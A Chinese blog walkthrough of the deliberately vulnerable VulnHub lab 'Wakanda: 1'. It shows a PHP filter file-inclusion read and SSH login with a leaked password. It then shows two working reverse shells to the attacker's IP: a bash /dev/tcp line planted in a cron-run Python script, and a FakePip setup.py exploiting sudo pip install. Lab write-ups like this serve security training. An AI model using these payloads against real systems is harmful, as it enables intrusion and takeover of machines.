Wakanda: 1靶场复现【附代码】(权限提升)

已于 2024-08-10 21:55:51 修改
阅读量709 收藏 15
点赞数 29
分类专栏: 打靶日常 文章标签: 网络 经验分享 笔记 网络安全 web安全
于 2024-08-10 21:45:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52487093/article/details/141096824
版权

靶机下载地址:

wakanda: 1 ~ VulnHubwakanda: 1, made by xMagass. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/wakanda-1,251/#download

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:DB:19:70'

1.2. 端口扫描

nmap 192.168.7.171 -p- -A

1.3. 目录扫描

dirb http://192.168.7.171

1.4. 敏感信息收集

whatweb http://192.168.7.171

2. WEB打点寻找漏洞点

2.1. 访问80端口

1.进了主页面,老规矩随便点点功能点,网页底线有些邮箱信息【mamadou】,暂时没实际用途 -> 查看网站源代码,有提示

2.拼接/?lang=fr试试看,没事大变换,但是url可能存在文件包含漏洞

3.尝试读取拼接路径读取网站源码

/?lang=php://filter/convert.base64-encode/resource=index

直接看网站源代码方便一些 -> 疑似base64加密 -> 解密得到密码

Niamey4Ever227!!!

2.2. SSH登录-GetShell

尝试用得到的密码搭配着邮箱信息登陆一下 -> 登录成功

mamadou:Niamey4Ever227!!!

切换至shell窗口

3. 权限提升

1查看当前用户的命令权限,没权限看 -> 查看内核版本,没有找到合适的提权方式

sudo -l
uname -a

2.在passwd中发现另一个用户 devops

3进入devops根目录,查看flag2文件,没有权限

4.看看其他关联文件

find / -user devops 2>/dev/null

发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中

cat /srv/.antivirus.py
open('/tmp/test','w').write('test')

将内容修改一下,尝试执行反弹shell

vi /srv/.antivirus.py
import os
os.system("echo 'bash -i >& /dev/tcp/192.168.7.36/4444 0>&1'|bash")

5.打开kali的监听【因为是计划任务稍等一会就会上线】

nc -lvvp 4444

查看第二个flag文件

6.查看当前用户的命令权限 -> 是all,尝试直接提权 -> 不大行

sudo -l
sudo su

7.网上找了一个相干的exp,创建一个setup.py,在其中写入

from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
    def run(self):
        install.run(self)
        RHOST = '192.168.7.36' 

        reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 8888; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
        encoded = base64.b64encode(reverse_shell)
        os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

修改为kali的ip

开启临时web服务,将其下载到 /tmp 目录中

wget http://192.168.7.36:8001/setup.py

kali开启监听

nc -lvnp 8888

靶机执行命令,成功反弹shell,提权成功

sudo /usr/bin/pip install . --upgrade --force-reinstall

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值